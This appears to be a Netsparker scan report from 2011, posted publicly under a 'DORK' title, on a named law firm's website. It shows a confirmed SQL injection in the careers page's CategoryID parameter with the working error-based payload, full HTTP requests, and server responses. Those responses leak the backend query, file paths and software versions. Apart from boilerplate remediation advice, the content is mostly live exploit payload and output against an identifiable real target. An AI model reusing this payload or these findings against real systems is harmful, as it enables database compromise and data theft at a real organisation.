SQL Injection, Database User is Admin, DORK, Weak Configuration
Loading
Netsparker - Scan Report Summary
TARGET URL
http://www.nutter.com/careers.php?CategoryID=...
SCAN DATE
4/19/2011 8:10:36 PM
REPORT DATE
4/19/2011 8:44:38 PM
SCAN DURATION
00:18:37
Total Requests
Average Speed
req/sec.
13
identified
6
confirmed
2
critical
3
informational
GHDB, DORK Tests
GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
Vulnerabilities
GHDB, DORK VULNERABILITIES
GHDB, DORK VULNERABILITIES
SQL Injection
SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker
confirmed the vulnerability by executing a test SQL Query on the back-end database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping ). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries )
Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements ). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
Parameters
Parameter
Type
Value
CategoryID
GET
(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
CareerID
GET
17
SectionID
GET
380
Request
GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17&SectionID=380 HTTP/1.1 Referer: http://www.nutter.com/careers.php?CategoryID=23 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:12:17 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Careers : Nutter McClennen & Fish LLP--> <title>Careers : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>50</b><br />error: Duplicate entry '_!@4dilemma:0' for key 1 | 1062<BR>sql: SELECT CategoryName FROM _categories WHERE IsActive='y' AND CategoryID=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) LIMIT 1<br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>75</b><br /><ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised" style="cursor: default;"><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="margin-top: 15px; margin-left: 11px; border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a><br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Careers : Nutter McClennen & Fish LLP</span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="rollover('offices', 'http://www.nutter.com/media/leftNav/offices_over.gif')" onmouseout="rollover('offices', 'http://www.nutter.com/media/leftNav/offices.gif')"><img src="http://www.nutter.com/media/leftNav/offices.gif" name="offices" alt="OFFICES"/></a><a href="http://www.nutter.com/client_services.php?SectionID=2" title="NUTTER INVESTMENT ADVISORS" onmouseover="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors_over.gif')" onmouseout="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors.gif')"><img src="http://www.nutter.com/media/leftNav/advisors.gif" name="advisors" alt="NUTTER INVESTMENT ADVISORS"/></a> </div></div><!-- body end --> <!--- sIFR script ---><script type="text/javascript">//<![CDATA[// Load the sIFR font for the feed's title.if(typeof sIFR == "function"){ sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/century.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars..
[Probable] SQL Injection
[Probable] SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it
could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.
Impact
Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
See the remedy for solution.
If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping ). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries )
Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.
A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements ). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
Parameters
Parameter
Type
Value
CategoryID
GET
%27
CareerID
GET
17
SectionID
GET
380
Request
GET /careers.php?CategoryID=%2527&CareerID=17&SectionID=380 HTTP/1.1 Referer: http://www.nutter.com/careers.php?CategoryID=23 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:10:24 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!--Careers : --> <title>Careers : </title><!-- <meta name="keywords" content="" /> <meta name="description" content="" />--> <meta name="keywords" content="" /> <meta name="description" content="" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!-- Start Right Ads --><div id="Ads"><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: #08004Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>50</b><br />error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 LIMIT 1' at line 1 | 1064<BR>sql: SELECT CategoryName FROM _categories WHERE IsActive='y' AND CategoryID=%27 LIMIT 1<br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>75</b><br /><ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised" style="cursor: default;"><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="margin-top: 15px; margin-left: 11px; border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a><br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Careers : </span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="rollover('offices', 'http://www.nutter.com/media/leftNav/offices_over.gif')" onmouseout="rollover('offices', 'http://www.nutter.com/media/leftNav/offices.gif')"><img src="http://www.nutter.com/media/leftNav/offices.gif" name="offices" alt="OFFICES"/></a><a href="http://www.nutter.com/client_services.php?SectionID=2" title="NUTTER INVESTMENT ADVISORS" onmouseover="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors_over.gif')" onmouseout="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors.gif')"><img src="http://www.nutter.com/media/leftNav/advisors.gif" name="advisors" alt="NUTTER INVESTMENT 